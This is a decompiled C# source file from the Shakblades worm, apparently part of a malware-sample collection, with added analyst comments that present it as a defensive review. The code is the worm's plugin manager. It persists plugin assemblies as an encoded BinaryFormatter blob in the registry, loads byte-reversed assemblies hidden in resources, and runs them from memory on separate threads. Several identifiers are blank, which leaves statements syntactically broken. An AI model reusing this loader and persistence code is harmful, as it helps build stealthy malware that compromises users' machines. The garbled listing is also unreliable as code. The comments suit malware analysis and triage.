MalwareSourceCode/MSIL/Worm/Win32/S/Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f/ᙐᗡѬᵲ૦ᵛଔѥቾ.cs

// Decompiled with JetBrains decompiler
// Type: Ҧ߲๒ʽ໙ୄᴘ.ᙐᗡѬᵲ૦ᵛଔѥቾ
// Assembly: dns-sd, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 4A42D535-5A92-4CC4-9677-40E6ACE36033
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Worm.Win32.Shakblades.ajg-02a9138068421a7a0b8924d80ebf6e55a41d8132d9fc1210df874ab33801b79f.exe
using Microsoft.Win32;
using Plugin;
using System;
using System.Collections.Generic;
using System.IO;
using System.Reflection;
using System.Resources;
using System.Runtime.Serialization.Formatters.Binary;
using System.Threading;
namespace Ҧ߲ʽ
{
// Analyst notes (defensive review of a decompiled sample).
// This class is the sample's plugin manager: it keeps plugin assemblies and their live
// instances in static lists, loads them from embedded resources or from a registry value,
// and runs them on separate threads.
// Several identifiers are blank in this listing (the obfuscated names apparently did not
// survive decompilation/extraction), so members are described by role rather than by name.
public class Ѭѥ
{
// Plugin Guid -> raw assembly bytes. This is the list that is serialized to the registry.
public static SortedList<Guid, byte[]> \u0382Ⴊ\u19CD\u0DF1в = new SortedList<Guid, byte[]>();
// Plugin Guid -> instantiated IPlugin object (field name is blank in this listing).
public static SortedList<Guid, IPlugin> = new SortedList<Guid, IPlugin>();
// Last status/error text; cleared on success and returned by the getter further down.
private static string \u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
// Event of the delegate type declared at the end of the class.
// NOTE(review): the loader invokes a differently named member; presumably that is the
// compiler-generated backing field of this event - confirm in the binary.
public static event Ѭѥ. \u0C11\u0FBFᵥރតൃĚŹᗐ;
// Saves the Guid -> assembly-bytes list to the registry.
// The list is serialized with BinaryFormatter, passed through a helper in another class
// (presumably an encoding/obfuscation step - not visible here), and written as a binary
// value. Hive, subkey and value name all come from the configuration class.
// Defender note: the stored plugins live in a single binary registry value; a large
// REG_BINARY blob under the configured key is the artefact to collect during triage.
public static void ()
{
try
{
BinaryFormatter binaryFormatter = new BinaryFormatter();
MemoryStream serializationStream = new MemoryStream();
binaryFormatter.Serialize((Stream) serializationStream, (object) Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в);
serializationStream.Close();
// MemoryStream.ToArray() still works after Close(); the helper transforms the bytes.
byte[] numArray = \u1928ᔾዔ.(serializationStream.ToArray(), false);
// The configuration selects HKCU or HKLM (HKLM writes need elevated rights).
if (ȩזڹ.Փ̗ == RegistryHive.CurrentUser)
Registry.CurrentUser.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזڹ.ެΙά\u066A, (object) numArray);
else
Registry.LocalMachine.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).SetValue(ȩזڹ.ެΙά\u066A, (object) numArray);
}
catch
{
// Every failure is swallowed silently; nothing is logged or reported.
}
}
// Restores plugins from the registry on a new thread.
// Reads the binary value, passes it through a helper (presumably the inverse of the
// transform used when saving - confirm), deserializes it back into the Guid -> bytes
// list and hands every stored assembly to the loader.
// Defender notes:
// - BinaryFormatter.Deserialize runs on data taken from the registry. BinaryFormatter is
//   unsafe on data that another party can write, so the value is a code-execution input.
// - CreateSubKey is used even for reading; it creates the key when it does not exist, so
//   the key can be present on a host with no stored value.
public static void ʉͧ\u05CB\u00A9դܛ() => new Thread((ThreadStart) (() =>
{
try
{
BinaryFormatter binaryFormatter = new BinaryFormatter();
// memoryStream and numArray1 are only ever set to null (decompiler residue).
MemoryStream memoryStream;
byte[] numArray1;
if (ȩזڹ.Փ̗ == RegistryHive.CurrentUser)
{
MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.\u09D1য়᪷(Registry.CurrentUser.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזڹ.ެΙά\u066A) as byte[], false));
// "as" yields null if the payload is not the expected list type; the foreach below
// then throws and the empty catch hides it.
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
serializationStream.Close();
serializationStream.Dispose();
memoryStream = (MemoryStream) null;
numArray1 = (byte[]) null;
}
else
{
// Same steps as above, against HKLM.
MemoryStream serializationStream = new MemoryStream(\u1928ᔾዔ.\u09D1য়᪷(Registry.LocalMachine.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).GetValue(ȩזڹ.ެΙά\u066A) as byte[], false));
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в = binaryFormatter.Deserialize((Stream) serializationStream) as SortedList<Guid, byte[]>;
serializationStream.Close();
serializationStream.Dispose();
memoryStream = (MemoryStream) null;
numArray1 = (byte[]) null;
}
// Each stored byte array is loaded as an assembly by the loader method.
foreach (byte[] numArray2 in (IEnumerable<byte[]>) Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.Values)
Ѭѥ.ͷ݁ȁ\u0EF1ቺ\u002F(numArray2);
}
catch
{
// Failures (missing value, bad data) are swallowed silently.
}
})).Start();
// Loads plugins embedded in this executable, on a new thread.
// Opens the resource set "p", reads the integer "Len" and then the byte arrays stored
// under the names "0" .. "Len-1". Each array is reversed before it is loaded.
// Defender note: the embedded assemblies are stored back to front, so a static scan of
// the resource data has to account for the reversal to see the original image.
public static void dz() => new Thread((ThreadStart) (() =>
{
try
{
// Nothing to do when the executable carries no manifest resources.
if (Assembly.GetExecutingAssembly().GetManifestResourceNames().Length == 0)
return;
ResourceManager resourceManager = new ResourceManager("p", Assembly.GetExecutingAssembly());
int num = (int) resourceManager.GetObject("Len");
for (int index = 0; index < num; ++index)
{
byte[] numArray = (byte[]) resourceManager.GetObject(index.ToString());
// In-place reversal restores the byte order expected by the loader.
Array.Reverse((Array) numArray);
Ѭѥ.ͷ݁ȁ\u0EF1ቺ\u002F(numArray);
}
// Configuration flag; the same flag gates the registry clean-up method below.
if (!ȩזڹ.ũކߠ)
return;
// Call to a parameterless member whose name is blank in this listing - presumably the
// registry save routine at the top of the class (confirm in the binary).
Ѭѥ.();
}
catch (Exception ex)
{
Console.WriteLine(ex.Message);
}
})).Start();
// Loader: loads an assembly from a byte array and registers the first plugin type in it.
// Returns true when a plugin was registered; false when the plugin was already present
// in both lists, when no matching type was found, or when an exception occurred. The
// status string is updated in each failure case.
// Defender notes:
// - Assembly.Load(byte[]) loads the image from memory, so the loaded assembly has no
//   backing file (Assembly.Location is empty), which is a useful hunting signal.
// - The plugin is instantiated, and run if it asks for it, BEFORE the duplicate check,
//   so the on-load code of a plugin that is already registered still runs.
public static bool ͷ݁ȁ\u0EF1ቺ\u002F(byte[] _param0)
{
try
{
foreach (Type type in Assembly.Load(_param0).GetTypes())
{
// Counts how many of the two lists already contain this plugin's Guid.
int num = 0;
if (type.IsClass && type.IsSubclassOf(typeof (IPlugin)))
{
IPlugin instance = (IPlugin) Activator.CreateInstance(type);
if (instance.ExecuteOnLoad)
{
instance.Initialize();
// Runs the plugin on its own thread with the arguments it supplies itself.
Ѭѥ.Đȃ((object) null, instance, instance.ExecuteOnLoadArgs);
}
if (!Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.ContainsKey(instance.Guid))
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.Add(instance.Guid, _param0);
else
++num;
if (!Ѭѥ..ContainsKey(instance.Guid))
Ѭѥ..Add(instance.Guid, instance);
else
++num;
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
if (num == 2)
{
// Status = plugin name + a string decoded at runtime by a helper in another class.
// The plaintext is not visible here; presumably an "already loaded" message.
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = instance.Name + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
return false;
}
// Notify subscribers, then stop: only the first matching type per assembly is handled.
if (Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, instance);
return true;
}
}
// No matching type in the assembly: the status is set to another runtime-decoded string.
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("dp+UpqZTqpynm1N8g5+ompyhUzOdE72coaeYpZmUlphToaKnU5miqKGXYQ==", true);
}
catch (Exception ex)
{
// Load/instantiate errors go to the console and into the status string.
Console.WriteLine(ex.Message);
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = ex.Message;
}
return false;
}
// Registers an already constructed plugin object in the instance list only (no assembly
// bytes are stored, so it is not part of what the save routine writes to the registry).
// Returns false and sets the status string when the Guid is already registered.
public static bool ќ\u0B76ୁ(IPlugin _param0)
{
if (!Ѭѥ..ContainsKey(_param0.Guid))
{
Ѭѥ..Add(_param0.Guid, _param0);
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = string.Empty;
if (Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA != null)
Ѭѥ.ޅ\u0ADCğඐႳᚦ\u086Fn\u09FA((object) null, _param0);
return true;
}
Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ = _param0.Name + \u1928ᔾዔ.\u005B\u0E8EЇᘹഏಔভ("bVN0n6WYlJcznRO9rFOGp6KlmJc=", true);
return false;
}
// Removes a plugin by Guid from both in-memory lists. The registry copy is not touched
// here, so a removed plugin stays in the stored blob until the list is saved again.
public static void \u136Eᐰ\u1CAA\u0EE1ள(Guid _param0)
{
if (!Ѭѥ..ContainsKey(_param0))
return;
Ѭѥ.\u0382Ⴊ\u19CD\u0DF1в.Remove(_param0);
Ѭѥ..Remove(_param0);
}
// Returns the last status/error string.
public static string \u0CC0() => Ѭѥ.\u1AA8ᓅȻٻ\u0DCE\u02F8\u193Cᰮ;
// Runs a plugin's Execute method on a new thread. The first parameter's name is blank in
// this listing; it is passed through to Execute as its first argument.
public static void Đȃ(object , IPlugin _param1, PluginArgs _param2) => new Thread((ThreadStart) (() =>
{
try
{
_param1.Execute(, _param2);
}
catch (Exception ex)
{
// Plugin exceptions are only printed; they do not stop the host process.
Console.WriteLine(ex.Message);
}
})).Start();
// Deletes the stored plugin blob from the registry when the configuration flag is set.
// Only the value is deleted; the subkey itself stays (and CreateSubKey creates it if it
// was missing), so the key can remain as a residual artefact after clean-up.
public static void \u0ECFȐفᅵټ༵୩()
{
try
{
if (!ȩזڹ.ũކߠ)
return;
if (ȩזڹ.Փ̗ == RegistryHive.CurrentUser)
Registry.CurrentUser.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזڹ.ެΙά\u066A);
else
Registry.LocalMachine.CreateSubKey(ȩזڹ.\u187Dठ\u1371aːࠍؒ\u0A7Dᇁ).DeleteValue(ȩזڹ.ެΙά\u066A);
}
catch
{
// Errors (for example a value that does not exist) are swallowed silently.
}
}
// Delegate type of the plugin event (type name is blank in this listing).
public delegate void (object sender, IPlugin plugin);
}
}